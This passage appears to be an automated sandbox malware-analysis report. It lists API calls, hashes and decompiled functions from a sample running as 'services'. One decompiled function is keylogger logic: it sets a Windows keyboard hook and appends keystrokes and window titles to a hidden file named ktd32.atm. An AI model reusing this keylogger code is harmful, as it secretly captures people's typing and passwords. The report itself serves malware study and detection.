0x10001682
0x1000168a
0x1000168f
0x10001694
0x10001696
0x1000169b
0x1000169e
0x100016a9
0x100016a9
0x10001636
0x10001636
0x1000163b
0x10001642
0x10001647
0x1000164a
0x1000164f
0x10001654
0x1000165a
0x1000165a
0x1000165d
0x10001662
0x10001664
0x10001669
0x1000166e
0x10001670
0x10001675
0x10001675
0x100016ae
0x100016af
0x100016b1
0x100016b1
0x100015a1
0x100015a4
0x100015a9
0x100015ae
0x100015af
0x100015b4
0x100015b5
0x100015b7
0x100015ba
0x100015bd
0x100015c4
0x100015e4
0x100015e4
0x10001619
0x10001619
0x1000161c
0x10001621
0x10001624
0x10001629
0x00000000
0x1000162d
0x100015c6
0x100015cb
0x100015d0
0x100015eb
0x100015eb
0x100015f3
0x100015f6
0x100015f7
0x100015fc
0x100015fe
0x10001606
0x10001608
0x1000160a
0x1000160d
0x1000160d
0x10001612
0x00000000
0x10001612
0x100015d6
0x100015db
0x00000000
0x00000000
0x100015e1
0x00000000

APIs

#1116.MFC42(?,?,?,?,?,?,10001849,?,?,?,?,?,?), ref: 100015A4
#1176.MFC42(?,?,?,?,?,?,10001849,?,?,?,?,?,?), ref: 100015A9
#1575.MFC42(?,00000000,1000221C,00000000,?,?,?,?,?,?,10001849,?,?,?,?,?), ref: 100015BD
#1168.MFC42(?,00000000,1000221C,00000000,?,?,?,?,?,?,10001849,?,?,?,?,?), ref: 100015C6
#1577.MFC42(?,00000000,1000221C,00000000,?,?,?,?,?,?,10001849,?,?,?,?,?), ref: 100015E4
#1182.MFC42(100051F8,?,?,00000000,1000221C,00000000,?,?,?,?,?,?,10001849,?,?,?), ref: 100015F7
??2@YAPAXI@Z.MSVCRT ref: 100015FE
#342.MFC42(100051F8,00000000,100051F8,?,?,00000000,1000221C,00000000,?,?,?,?,?,?,10001849,?), ref: 1000160D
#1176.MFC42(?,00000000,1000221C,00000000,?,?,?,?,?,?,10001849,?,?,?,?,?), ref: 1000161C
#1243.MFC42(?,?,00000000,1000221C,00000000,?,?,?,?,?,?,10001849,?,?,?,?), ref: 10001624
#1243.MFC42(10004168,?,?,?,?,10001849,?,?,?,?,?,?), ref: 1000163B
#1176.MFC42(10004168,?,?,?,?,10001849,?,?,?,?,?,?), ref: 10001642
#1168.MFC42(10004168,?,?,?,?,10001849,?,?,?,?,?,?), ref: 1000164A
#1197.MFC42(10004168,?,?,?,?,10001849,?,?,?,?,?,?), ref: 1000165D
#1570.MFC42(000000FF,10004168,?,?,?,?,10001849,?,?,?,?,?,?), ref: 10001664
#1577.MFC42(000000FF,10004168,?,?,?,?,10001849,?,?,?,?,?,?), ref: 10001669
#1253.MFC42(100051F8,00000001,000000FF,10004168,?,?,?,?,10001849,?,?,?,?,?,?), ref: 10001675
#6467.MFC42(10004168,?,?,?,?,10001849,?,?,?,?,?,?), ref: 1000168A
#1197.MFC42(10004168,?,?,?,?,10001849,?,?,?,?,?,?), ref: 1000168F
#1570.MFC42(000000FF,10004168,?,?,?,?,10001849,?,?,?,?,?,?), ref: 10001696
#1255.MFC42(?,000000FF,10004168,?,?,?,?,10001849,?,?,?,?,?,?), ref: 1000169E

Memory Dump Source

Source File: 00000008.00000002.620690874.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.620683187.0000000010000000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000008.00000002.620698590.0000000010002000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000008.00000002.620706094.0000000010003000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000008.00000002.620713315.0000000010007000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_services.jbxd

Similarity

API ID: #1176$#1168#1197#1243#1570#1577$#1116#1182#1253#1255#1575#342#6467??2@
String ID:
API String ID: 2704106941-0
Opcode ID: 17665d5ca7ab4ccd717e71c142e2c3d96eebe9d7b168886f04d116249c188f78
Instruction ID: d278b07dccb1928ff768770d48e4f8c1ebd2f1176a7915bc84633bf2b2ff536a
Opcode Fuzzy Hash: 17665d5ca7ab4ccd717e71c142e2c3d96eebe9d7b168886f04d116249c188f78
Instruction Fuzzy Hash: 2B319238600205BFFB00EF65CC55ADE77E5EF402E1B158029F8255B26ACF35EA819B51

Uniqueness

Uniqueness Score: -1.00%

Function 025F1320 Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,?,?,?,025F16D1,025F60A8), ref: 025F1333

Memory Dump Source

Source File: 00000008.00000002.620262476.00000000025F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 025F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_25f1000_services.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8edcfa640108cfbd2432c363f8348d105a887627dce702fb3d42564e11295e79
Instruction ID: e5521c2a13095ab98942fdb3a26feb0bf281bcdceec865786e138e408a4ecf9e
Opcode Fuzzy Hash: 8edcfa640108cfbd2432c363f8348d105a887627dce702fb3d42564e11295e79
Instruction Fuzzy Hash: 15110C7274071497DE606E6AEC84FA7B79CFF816617068465EA09C7A01E722E40466A8

Uniqueness

Uniqueness Score: -1.00%

Function 025F2DDE Relevance: 6.1, APIs: 4, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(00000000,025F6958,?,00000000), ref: 025F2E06
RtlAllocateHeap.NTDLL(00000008,000041C4,?), ref: 025F2E3A
VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004), ref: 025F2E54
HeapFree.KERNEL32(00000000,?), ref: 025F2E6B

Memory Dump Source

Source File: 00000008.00000002.620262476.00000000025F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 025F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_25f1000_services.jbxd

Similarity

API ID: Heap$Allocate$AllocFreeVirtual
String ID:
API String ID: 94566200-0
Opcode ID: ebc7e139425915322253a1461cf5d9e611fc48a85859b35772c3e127332d5d3f
Instruction ID: 5da0ab05e40d1d1a1ed7aee874c5a9b3d04519e1b4129db886f1e62f61e701d4
Opcode Fuzzy Hash: ebc7e139425915322253a1461cf5d9e611fc48a85859b35772c3e127332d5d3f
Instruction Fuzzy Hash: E3118F70A81201AFC7A58F19ED44E227BBAFB45310B604D19FB71C75A0E3319569EF58

Uniqueness

Uniqueness Score: -1.00%

Function 025F23DE Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,025F193D,00000001), ref: 025F23EF

Part of subcall function 025F2741: RtlAllocateHeap.NTDLL(00000000,00000140,025F2403), ref: 025F274E

HeapDestroy.KERNEL32 ref: 025F240D

Memory Dump Source

Source File: 00000008.00000002.620262476.00000000025F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 025F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_25f1000_services.jbxd

Similarity

API ID: Heap$AllocateCreateDestroy
String ID:
API String ID: 316229882-0
Opcode ID: 821ff10304a0a94934f0d24f383b4734c8332699dad3cb8715c921fba13a5322
Instruction ID: 843afe664b62317a8c29e27fd1bcecd1f8a3103e4823c7fdbeaf8cf48f4083e1
Opcode Fuzzy Hash: 821ff10304a0a94934f0d24f383b4734c8332699dad3cb8715c921fba13a5322
Instruction Fuzzy Hash: 97E012B1A913019AEF911F319D08B653ED9BB44782F004835BF15C4194E7A0C064B509

Uniqueness

Uniqueness Score: -1.00%

Function 025F13F0 Relevance: 3.0, APIs: 2, Instructions: 16
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindWindowA.USER32(00000000,025F612C), ref: 025F13F8
GetWindowThreadProcessId.USER32(00000000), ref: 025F140D

Memory Dump Source

Source File: 00000008.00000002.620262476.00000000025F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 025F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_25f1000_services.jbxd

Similarity

API ID: Window$FindProcessThread
String ID:
API String ID: 3928697162-0
Opcode ID: 3a91a593fc712f1a2f9ac2862ed4100ab72830d69e80e781bec889a05c173656
Instruction ID: 4184ea2726c761a04a0559982029a4d2606d37b1b4521d4fdf492f29f2508047
Opcode Fuzzy Hash: 3a91a593fc712f1a2f9ac2862ed4100ab72830d69e80e781bec889a05c173656
Instruction Fuzzy Hash: 3CD0A7B5544200ABE6844B74D80DF263B5CFB84622F244A0CF217C15C0EF7090145615

Uniqueness

Uniqueness Score: -1.00%

Function 025F2F8A Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,?), ref: 025F2FDF

Memory Dump Source

Source File: 00000008.00000002.620262476.00000000025F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 025F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_25f1000_services.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ae639ae2621d99242fa9a0798d68357c4425b0739df81fa973a79f963a73c074
Instruction ID: ae19f7c3805e2a76539b2e0845d1c96111d77e179d3c06fc75f4418fadd6d2b4
Opcode Fuzzy Hash: ae639ae2621d99242fa9a0798d68357c4425b0739df81fa973a79f963a73c074
Instruction Fuzzy Hash: 0A014CF3D5161136E6B22524AC41B6A2B1DBBC07B1F060562FF64E71C0E7304C4859AD

Uniqueness

Uniqueness Score: -1.00%

Function 10001260 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10001260() {
				struct HHOOK__* _t2;

				_t2 = SetWindowsHookExA(2, E10001030,  *0x10004158, 0); // executed
				 *0x10004160 = _t2;
				return 1;
			}

0x1000126f
0x10001275
0x1000127f

APIs

SetWindowsHookExA.USER32 ref: 1000126F

Memory Dump Source

Source File: 00000008.00000002.620690874.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.620683187.0000000010000000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000008.00000002.620698590.0000000010002000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000008.00000002.620706094.0000000010003000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000008.00000002.620713315.0000000010007000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_services.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: fb7839fd70a4474d25bd8aad22c0503ba2dc20e114dd8a80fc069765cb6093b1
Instruction ID: 95a7a43aef5fdc04acaee2d608f68f3ea518605b8de8574bfbedb8b544be95d1
Opcode Fuzzy Hash: fb7839fd70a4474d25bd8aad22c0503ba2dc20e114dd8a80fc069765cb6093b1
Instruction Fuzzy Hash: 83C04CB4251260ABF210DB948C89BD13698F3687C1F420054F614D5298C7A455808618

Uniqueness

Uniqueness Score: -1.00%

Function 025F1710 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExA.USER32(00000005,Function_000006F0,025F64C8,00000000), ref: 025F171F

Memory Dump Source

Source File: 00000008.00000002.620262476.00000000025F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 025F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_25f1000_services.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: aae27e2e170efbe077d55f47151eb4d6a5155e60e1a1ab2c86a823ef964e67b1
Instruction ID: c6085292d68748ca42bde3fc201cfadee13a485a84a8ac01a3c57bf9c25950a5
Opcode Fuzzy Hash: aae27e2e170efbe077d55f47151eb4d6a5155e60e1a1ab2c86a823ef964e67b1
Instruction Fuzzy Hash: AEC04C74AC0700AAE2805E50AC55B213B5CB704741F504404B719D6588EBA054186A1C

Uniqueness

Uniqueness Score: -1.00%

Function 025F2E8F Relevance: 1.3, APIs: 1, Instructions: 85
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,?,00000000,000000E0,?,?,025F2BB5,000000E0,?,?,?), ref: 025F2EE0

Memory Dump Source

Source File: 00000008.00000002.620262476.00000000025F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 025F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_25f1000_services.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9205077faa3b6fc05f64faa65614127c135723127c12686fc063115fd81da392
Instruction ID: 6fdc33074ee9ca941a464e9650cc4363b79836b683405440561f29467e32d9d0
Opcode Fuzzy Hash: 9205077faa3b6fc05f64faa65614127c135723127c12686fc063115fd81da392
Instruction Fuzzy Hash: E631BAB16002029FD314CF18C484BA5FBE4FB44368F2582B9EA19CB2A2E770E906CB44

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10001030 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 174
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E10001030(signed int __ecx, int _a4, int _a8, long _a12) {
				char _v1504;
				char _v1512;
				char _v2760;
				char _v2768;
				char _v3024;
				short _v3026;
				char _v3027;
				struct _IO_FILE* _t35;
				intOrPtr _t38;
				char _t42;
				intOrPtr _t53;
				long _t54;
				signed int _t55;
				signed int _t58;
				signed int _t61;
				intOrPtr* _t67;
				struct _IO_FILE* _t72;
				signed int _t74;
				signed int _t75;
				signed int _t80;
				intOrPtr _t81;
				intOrPtr _t88;
				int _t97;
				void* _t105;
				void* _t106;
				void* _t107;
				int _t108;
				void* _t109;
				void* _t112;

				_t55 = __ecx;
				_t54 = _a12;
				_t108 = _a8;
				if((_t54 & 0x40000000) != 0 && _a4 == 0 && (_t108 == 0x20 || _t108 == 9 || _t108 == 8 || _t108 == 0xd || _t108 >= 0x2f && _t108 <= 0x100)) {
					GetWindowsDirectoryA(0x1000319c, 0x104);
					asm("repne scasb");
					_t58 =  !(_t55 | 0xffffffff);
					_t105 = "\\ktd32.atm" - _t58;
					_t80 = _t58;
					asm("repne scasb");
					_t61 = _t80 >> 2;
					memcpy(0x1000319b, _t105, _t61 << 2);
					memcpy(_t105 + _t61 + _t61, _t105, _t80 & 0x00000003);
					_t35 = fopen(0x1000319c, "a+");
					_t112 = _t109 + 0x20;
					 *0x1000415c = _t35;
					if(_t35 != 0) {
						_t97 = GetWindowTextA(GetActiveWindow(),  &_v2768, 0x4e8);
						_t106 = 0x10003c70;
						_t67 =  &_v2768;
						while(1) {
							_t38 =  *_t67;
							_t81 = _t38;
							if(_t38 !=  *_t106) {
								break;
							}
							if(_t81 == 0) {
								L14:
								_t67 = 0;
							} else {
								_t53 =  *((intOrPtr*)(_t67 + 1));
								_t88 = _t53;
								_t10 = _t106 + 1; // 0x0
								if(_t53 !=  *_t10) {
									break;
								} else {
									_t67 = _t67 + 2;
									_t106 = _t106 + 2;
									if(_t88 != 0) {
										continue;
									} else {
										goto L14;
									}
								}
							}
							L16:
							if(_t67 != 0 && _t97 > 0) {
								wsprintfA( &_v1512, "\n[Windows title: \"%s\"]\n",  &_v2768);
								_t72 =  *0x1000415c;
								_push( &_v1504);
								fprintf(_t72, 0x10003020);
								asm("repne scasb");
								_t74 =  !(_t72 | 0xffffffff);
								_t107 =  &_v2760 - _t74;
								_t75 = _t74 >> 2;
								memcpy(0x10003c70, _t107, _t75 << 2);
								memcpy(_t107 + _t75 + _t75, _t107, _t74 & 0x00000003);
								_t112 = _t112 + 0x30;
							}
							if(_t108 != 0xd) {
								if(_t108 != 8) {
									if(_t108 != 9) {
										GetKeyboardState( &_v3024);
										ToAscii(_t108, 0,  &_v3024,  &_v3026, 0);
										_t42 = _v3026;
										_v3027 = _t42;
										if(_t42 != 0) {
											goto L26;
										}
									} else {
										_push( *0x1000415c);
										_push(1);
										_push(1);
										_v3027 = 9;
										_push( &_v3027);
										goto L27;
									}
								} else {
									_push( *0x1000415c);
									_push(1);
									_push(1);
									_v3027 = 0x7c;
									_push( &_v3027);
									goto L27;
								}
							} else {
								_v3027 = 0xa;
								L26:
								_push( *0x1000415c);
								_push(1);
								_push(1);
								_push( &_v3027);
								L27:
								fwrite();
								_t112 = _t112 + 0x10;
							}
							fclose( *0x1000415c);
							goto L29;
						}
						asm("sbb ecx, ecx");
						asm("sbb ecx, 0xffffffff");
						goto L16;
					}
				}
				L29:
				return CallNextHookEx( *0x10004160, _a4, _t108, _t54);
			}

0x10001030
0x10001037
0x1000103f
0x1000104e
0x10001096
0x100010ab
0x100010ad
0x100010b6
0x100010b8
0x100010c2
0x100010c7
0x100010ca
0x100010d1
0x100010d3
0x100010d9
0x100010dc
0x100010e3
0x10001103
0x10001105
0x1000110a
0x10001111
0x10001111
0x10001113
0x10001117
0x00000000
0x00000000
0x1000111b
0x10001131
0x10001131
0x1000111d
0x1000111d
0x10001120
0x10001122
0x10001125
0x00000000
0x10001127
0x10001127
0x1000112a
0x1000112f
0x00000000
0x00000000
0x00000000
0x00000000
0x1000112f
0x10001125
0x1000113a
0x1000113c
0x10001157
0x1000115d
0x1000116a
0x10001171
0x10001186
0x10001188
0x1000118e
0x10001195
0x10001198
0x1000119f
0x1000119f
0x1000119f
0x100011a4
0x100011b0
0x100011cc
0x100011ea
0x100011ff
0x10001205
0x1000120b
0x1000120f
0x00000000
0x00000000
0x100011ce
0x100011d8
0x100011d9
0x100011db
0x100011dd
0x100011e2
0x00000000
0x100011e2
0x100011b2
0x100011bc
0x100011bd
0x100011bf
0x100011c1
0x100011c6
0x00000000
0x100011c6
0x100011a6
0x100011a6
0x10001211
0x1000121a
0x1000121b
0x1000121d
0x1000121f
0x10001220
0x10001220
0x10001226
0x10001226
0x10001230
0x00000000
0x10001236
0x10001135
0x10001137
0x00000000
0x10001137
0x100010e3
0x10001239
0x1000125a

APIs

GetWindowsDirectoryA.KERNEL32(1000319C,00000104), ref: 10001096
fopen.MSVCRT ref: 100010D3
GetActiveWindow.USER32 ref: 100010E9
GetWindowTextA.USER32 ref: 100010FD
wsprintfA.USER32 ref: 10001157
fprintf.MSVCRT ref: 10001171
GetKeyboardState.USER32(?), ref: 100011EA
ToAscii.USER32(?,00000000,?,?,00000000), ref: 100011FF
fwrite.MSVCRT ref: 10001220
fclose.MSVCRT ref: 10001230
CallNextHookEx.USER32 ref: 1000124A

Strings

|, xrefs: 100011C1
[Windows title: "%s"], xrefs: 10001151
\ktd32.atm, xrefs: 1000109C

Memory Dump Source

Source File: 00000008.00000002.620690874.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.620683187.0000000010000000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000008.00000002.620698590.0000000010002000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000008.00000002.620706094.0000000010003000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000008.00000002.620713315.0000000010007000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_services.jbxd

Similarity

API ID: Window$ActiveAsciiCallDirectoryHookKeyboardNextStateTextWindowsfclosefopenfprintffwritewsprintf
String ID: [Windows title: "%s"]$\ktd32.atm$|
API String ID: 3932488077-584704332
Opcode ID: b6b550a0ca7fb355549611dd090063e49770f6d84123f19e4741500c430954a0
Instruction ID: c9baf4336a690739abea4ace524873d0ddc5ba0f92934a1a57ce988d36d99298
Opcode Fuzzy Hash: b6b550a0ca7fb355549611dd090063e49770f6d84123f19e4741500c430954a0
Instruction Fuzzy Hash: BB516830148346ABF728CB64CC95BFF7799EB963C4F01450DFA9283288EA759948C762

Uniqueness

Uniqueness Score: -1.00%

Function 025F3E18 Relevance: 13.7, APIs: 9, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringW.KERNEL32(00000000,00000100,025F5424,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 025F3E5A
LCMapStringA.KERNEL32(00000000,00000100,025F5420,00000001,00000000,00000000), ref: 025F3E76
LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 025F3EBF
MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 025F3EF7
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 025F3F4F
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 025F3F65
LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 025F3F98
LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 025F4000

Memory Dump Source

Source File: 00000008.00000002.620262476.00000000025F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 025F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_25f1000_services.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 80fa9a1f106e34a7dc46aa08117ad4b91320df00818a23c81096b600dc8c8686
Instruction ID: ff6d3c0533492c6ab85f9a3addc957f11ff718004bbb82b4bfff2084a0e1810a
Opcode Fuzzy Hash: 80fa9a1f106e34a7dc46aa08117ad4b91320df00818a23c81096b600dc8c8686
Instruction Fuzzy Hash: 7C517931940249BFEF628F94DC44EAF7FB9FB88B54F104559FB11A1150D3368960EBA8

Uniqueness

Uniqueness Score: -1.00%

Function 025F1090 Relevance: 9.2, APIs: 6, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExA.KERNEL32 ref: 025F10A7

Memory Dump Source

Source File: 00000008.00000002.620262476.00000000025F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 025F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_25f1000_services.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: e563be58dc0bca55d1c96aec5ff5b67237cdad9c11e5e6db8d969d3ba61082fc
Instruction ID: 8216f7f68cc19647966f480a49fe4019e44d2860ccce8138afb833e8ed48134b
Opcode Fuzzy Hash: e563be58dc0bca55d1c96aec5ff5b67237cdad9c11e5e6db8d969d3ba61082fc
Instruction Fuzzy Hash: A2818B75604346CFE760CF95D480BABBBE4FF85248F54C91DEA9A8B201D731E80ACB95

Uniqueness

Uniqueness Score: -1.00%

Function 025F4067 Relevance: 9.1, APIs: 6, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStringTypeW.KERNEL32(00000001,025F5424,00000001,00000000,?,00000100,00000000,025F34BD,00000001,00000020,00000100,?,00000000), ref: 025F40A6
GetStringTypeA.KERNEL32(00000000,00000001,025F5420,00000001,?), ref: 025F40C0
GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,025F34BD,00000001,00000020,00000100,?,00000000), ref: 025F40F4
MultiByteToWideChar.KERNEL32(025F34BD,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,025F34BD,00000001,00000020,00000100,?,00000000), ref: 025F412C
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 025F4182
GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 025F4194

Memory Dump Source

Source File: 00000008.00000002.620262476.00000000025F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 025F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_25f1000_services.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: b18d55ad0474f32cebc5864af78009786c9fb4616ec78fd3b7ef238f49ec2cd0
Instruction ID: a117a4aa7e10bcc6496a7a078df1f759fb9bf4e7c175ee8a7caebb1de92c2715
Opcode Fuzzy Hash: b18d55ad0474f32cebc5864af78009786c9fb4616ec78fd3b7ef238f49ec2cd0
Instruction Fuzzy Hash: E641B972A40219AFDFA09F94CC85EAF3FBDFB09250F400825FB15E6150E3319964DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 100016B4 Relevance: 9.0, APIs: 6, Instructions: 25
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E100016B4(intOrPtr _a8) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;

				if(_a8 != 1) {
					if(_a8 == 0) {
						L1000191E();
						_push( *((intOrPtr*)(_t5 + 8)));
						L10001900();
					}
					L5:
					_t6 = 1;
					return _t6;
				}
				_t7 = LocalAlloc(0, 0x2000);
				if(_t7 == 0) {
					return _t7;
				}
				_t8 = LocalFree(_t7);
				L1000191E();
				_push(0x10004168);
				L10001900();
				 *(_t8 + 8) = _t8;
				goto L5;
			}

0x100016b9
0x100016f0
0x100016f2
0x100016f7
0x100016fa
0x100016fa
0x100016ff
0x10001701
0x00000000
0x10001701
0x100016c2
0x100016ca
0x10001702
0x10001702
0x100016ce
0x100016d4
0x100016d9
0x100016e0
0x100016e5
0x00000000

APIs

LocalAlloc.KERNEL32(00000000,00002000), ref: 100016C2
LocalFree.KERNEL32(00000000), ref: 100016CE
#1176.MFC42 ref: 100016D4
#1243.MFC42(10004168), ref: 100016E0
#1176.MFC42 ref: 100016F2
#1243.MFC42(?), ref: 100016FA

Memory Dump Source

Source File: 00000008.00000002.620690874.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.620683187.0000000010000000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000008.00000002.620698590.0000000010002000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000008.00000002.620706094.0000000010003000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000008.00000002.620713315.0000000010007000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_services.jbxd

Similarity

API ID: #1176#1243Local$AllocFree
String ID:
API String ID: 2308495640-0
Opcode ID: 9fb6d43726aaf794d2878ddb8fc3a2fc103f0b295b564f1ae6d00e835cfc7872
Instruction ID: a33be0fd76479763a641220cae67225b3a70b358deed4ff216ce647065d31e6b
Opcode Fuzzy Hash: 9fb6d43726aaf794d2878ddb8fc3a2fc103f0b295b564f1ae6d00e835cfc7872
Instruction Fuzzy Hash: 58E01235504316EAF611D760CC9DBCA76D5EB007D2F198429F4089506ACA7198C0C611

Uniqueness

Uniqueness Score: -1.00%

Function 025F1500 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 153COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000064,00000000,00000000), ref: 025F155F

Strings

Microsoft DxDiag, xrefs: 025F163D
Winlogon, xrefs: 025F15AD
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}, xrefs: 025F1565
policies, xrefs: 025F15F5

Memory Dump Source

Source File: 00000008.00000002.620262476.00000000025F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 025F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_25f1000_services.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: Microsoft DxDiag$Winlogon$policies${5Y99AE78-58TT-11dW-BE53-Y67078979Y}
API String ID: 626452242-3733376503
Opcode ID: 8838351904bd42ab320477f6495505cfa49b507b016f515559e894d3d32ca948
Instruction ID: 3c51ee7307c8a64061a3a6e5707899ea9fe35945a6180ee623eb1e5e4ac1c529
Opcode Fuzzy Hash: 8838351904bd42ab320477f6495505cfa49b507b016f515559e894d3d32ca948
Instruction Fuzzy Hash: 2E41FD29A546509BD2704A345CB1BE33FDA6B6B224F1CC960EEDE87380E717C80CD754

Uniqueness

Uniqueness Score: -1.00%

Function 025F1D96 Relevance: 7.6, APIs: 5, Instructions: 150COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 025F1DF4
GetFileType.KERNEL32(00000480), ref: 025F1E9F
GetStdHandle.KERNEL32(-000000F6), ref: 025F1F02
GetFileType.KERNEL32(00000000), ref: 025F1F10
SetHandleCount.KERNEL32 ref: 025F1F47

Memory Dump Source

Source File: 00000008.00000002.620262476.00000000025F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 025F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_25f1000_services.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: ecc0d711a7c89e195bee785a83ecbdec3deaac55fdeaa37f5d12ef61b6cf5c1e
Instruction ID: a2619a71379561498d495e7810582112d6c7622897018c11ac26b7766e64f20b
Opcode Fuzzy Hash: ecc0d711a7c89e195bee785a83ecbdec3deaac55fdeaa37f5d12ef61b6cf5c1e
Instruction Fuzzy Hash: C151E331944B02CBD7A08F38D8487657FE4FB11328F19CA68C7AADB2D0E7709859D758

Uniqueness

